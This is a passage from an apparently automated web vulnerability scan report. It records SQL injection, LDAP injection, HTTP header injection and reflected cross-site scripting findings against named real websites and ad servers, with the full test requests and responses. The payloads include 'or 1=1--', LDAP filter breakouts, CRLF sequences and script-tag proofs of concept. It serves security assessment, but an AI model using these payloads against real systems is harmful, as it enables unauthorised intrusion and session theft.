Keep-Alive: 115
Proxy-Connection: keep-alive

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:21:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>404 Page Not Found</title>
<meta name="description" content="Why are we so dedicated to being a law firm &quot;different in kind&quot; from those you have encountered in the past? Because our goal is to be your trusted partner -- a partner you can rely on to solve your problems and enhance your business." />
<link rel="stylesheet" type="text/css" href="http://www.tuckerellis.com/css/interior.css" />
<link rel="stylesheet" media="print" type="text/css" href="http://www.tuckerellis.com/css/print.css" />
<link rel="shortcut icon" href="http://www.tuckerellis.com/tucker-favicon.ico" />
<script type="text/javascript" src="http://www.tuckerellis.com/javascript/justcorners.js"></script>
<script type="text/javascript" src="http://www.tuckerellis.com/javascript/functions.js"></script>

<script type="text/javascript">
if (document.layers) {var NN4 = true;}

if (document.all) {var IE = true;}

if (document.getElementById && !document.all) {var DOM = true;}

function getElement(id){
   if(NN4) {
       path = document.layers[id]
   } else if(IE) {
       path = document.all[id]
   } else {
       path = document.getElementById(id)
   }
   
   return path;
}
</script>
</head>

<body>

<div id="container">
<a href="http://www.tuckerellis.com/"><img src="http://www.tuckerellis.com/images/logo-sm.gif" border="0" alt="Tucker Ellis &amp; West" name="logo" width="344" height="47" id="logo" title="Tucker Ellis &amp; West" /></a>

<div id="navigation">

<div id="primary">
<script type="text/javascript">

var submenu = 'submenu0';
function NavOff() {
   getElement('submenu1').styl
...[SNIP]...

1.9. http://www.tuckerellis.com/tucker-favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.tuckerellis.com
Path:   /tucker-favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 25991164%20or%201%3d1--%20 and 25991164%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /tucker-favicon.ico?125991164%20or%201%3d1--%20=1 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 12 May 2011 12:21:44 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 304
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /tucker-favicon.ico
on this server.</p>
<hr>
<address>Apache/2.2.3 (CentOS) Server at www.tuckerellis.com Port 80</address>
</body></html>

Request 2

GET /tucker-favicon.ico?125991164%20or%201%3d2--%20=1 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 16 Apr 2009 13:44:14 GMT
ETag: "787a4-57e-42776780"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8


2. LDAP injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://akatracking.esearchvision.com
Path:   /esi/redirect2.html

Issue detail

The esvaid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 8ad6dbc7bbe7c3c8)(sn=* and 8ad6dbc7bbe7c3c8)!(sn=* were each submitted in the esvaid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=8ad6dbc7bbe7c3c8)(sn=*&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA8ad6dbc7bbe7c3c8)(sn=*=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA8ad6dbc7bbe7c3c8)(sn=*=;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34117
Date: Thu, 12 May 2011 11:01:14 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

Request 2

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=8ad6dbc7bbe7c3c8)!(sn=*&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA8ad6dbc7bbe7c3c8)!(sn=*=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA8ad6dbc7bbe7c3c8)!(sn=*=;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34117
Date: Thu, 12 May 2011 11:01:14 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

3. HTTP header injection
There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8e8e3%0d%0a4cbaf4bd3c9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8e8e3%0d%0a4cbaf4bd3c9;src=1170328;type=nytdd463;cat=dealb724;ord=1;num=5983610623516.143? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8e8e3
4cbaf4bd3c9
;src=1170328;type=nytdd463;cat=dealb724;ord=1;num=5983610623516.143:
Date: Thu, 12 May 2011 11:05:21 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://akatracking.esearchvision.com/esi/redirect2.html [esvaid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://akatracking.esearchvision.com
Path:   /esi/redirect2.html

Issue detail

The value of the esvaid request parameter is copied into the Set-Cookie response header. The payload 62e27%0d%0a952543f233d was submitted in the esvaid parameter. This caused a response containing an injected HTTP header.

Request

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=62e27%0d%0a952543f233d&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA62e27
952543f233d
=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11: 01:14 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA62e27
952543f233d=;expires=Fri, 11 May 2012 11: 01:14 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34117
Date: Thu, 12 May 2011 11:01:14 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

3.3. http://akatracking.esearchvision.com/esi/redirect2.html [esvcrea parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://akatracking.esearchvision.com
Path:   /esi/redirect2.html

Issue detail

The value of the esvcrea request parameter is copied into the Set-Cookie response header. The payload 26685%0d%0a292b8d9985f was submitted in the esvcrea parameter. This caused a response containing an injected HTTP header.

Request

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=26685%0d%0a292b8d9985f&esvt=128-MSUSe20937&transferparams=0&esvaid=40007&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA40007=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE26685
292b8d9985f
_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11: 01:14 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA40007=;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34117
Date: Thu, 12 May 2011 11:01:14 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

3.4. http://amch.questionmarket.com/adscgen/sta.php [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload e513e%0d%0a4a7e0968d52 was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=909615&site=312253240&code=e513e%0d%0a4a7e0968d52 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:16:19 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:16:18 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_909615-1-1; expires=Mon, 02-Jul-2012 03:16:19 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-A76)M-0; expires=Mon, 02-Jul-2012 03:16:19 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=atlas&survey_num=909615&site=2-312253240-&code=e513e
4a7e0968d52

Content-Length: 33
Content-Type: text/html

/* /adsc/d909615/2/-1/randm.js */

3.5. http://amch.questionmarket.com/adscgen/sta.php [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload 40cbd%0d%0a96c50092903 was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=909615&site=40cbd%0d%0a96c50092903&code=214693346 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:16:14 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:16:13 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_909615-1-1; expires=Mon, 02-Jul-2012 03:16:14 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-576)M-0; expires=Mon, 02-Jul-2012 03:16:14 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=atlas&survey_num=909615&site=-1-40cbd
96c50092903
-&code=214693346
Content-Length: 44
Content-Type: text/html

/* /adsc/d909615/-1/200214693346/randm.js */

4. Cross-site scripting (reflected)
There are 191 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://207.56.166.97/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://207.56.166.97
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f79e7"><script>alert(1)</script>1553382093a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof79e7"><script>alert(1)</script>1553382093a HTTP/1.1
Host: 207.56.166.97
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:41:46 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://207.56.166.97/favicon.icof79e7"><script>alert(1)</script>1553382093a');" title="Email Page">
...[SNIP]...

4.2. http://207.56.166.97/javascript/c_smartmenus.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://207.56.166.97
Path:   /javascript/c_smartmenus.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74711"><script>alert(1)</script>5c2b4746530 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

